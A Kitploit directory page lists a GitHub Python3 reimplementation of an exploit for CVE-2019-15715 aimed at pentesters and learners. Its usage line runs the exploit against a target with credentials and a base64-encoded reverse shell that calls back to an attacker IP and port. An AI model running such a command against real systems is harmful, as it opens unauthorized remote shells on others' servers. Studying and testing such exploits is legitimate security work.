Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-15715 — Replica of CVE-2019-15715 in Python3 | Kitploit
Tools/GitHubGitHub/mcornaglia/cve-2019-15715
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmcornaglia/cve-2019-15715

CVE-2019-15715

Replica of CVE-2019-15715 in Python3

View Repository
17 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-15715

The current repository is an implementation in Python3 of CVE-2019-15715 and aims to focus on the solely improvement of the CVE-2019-15715 previously reported here by Nikolas Geiselman by adding python's parameter implementation to make the script more flexible.

root@kitploit:~
python3 CVE-2019-15715.py -rh $TARGET_IP -rp $TARGET_PORT -lh $ATTACKER_IP -lp $ATTACKER_PORT -u $USER -p $PSW -e $ENDPOINT -rs $BASE64_REVSHELL
# You can use https://www.revshells.com/ and its Encoding option to encode the shell to base64 or eventually echo 'shell' | base64

It was an exercise for myself and hopefully something helpful for learners and already consolidated Pentesters.

Download Tool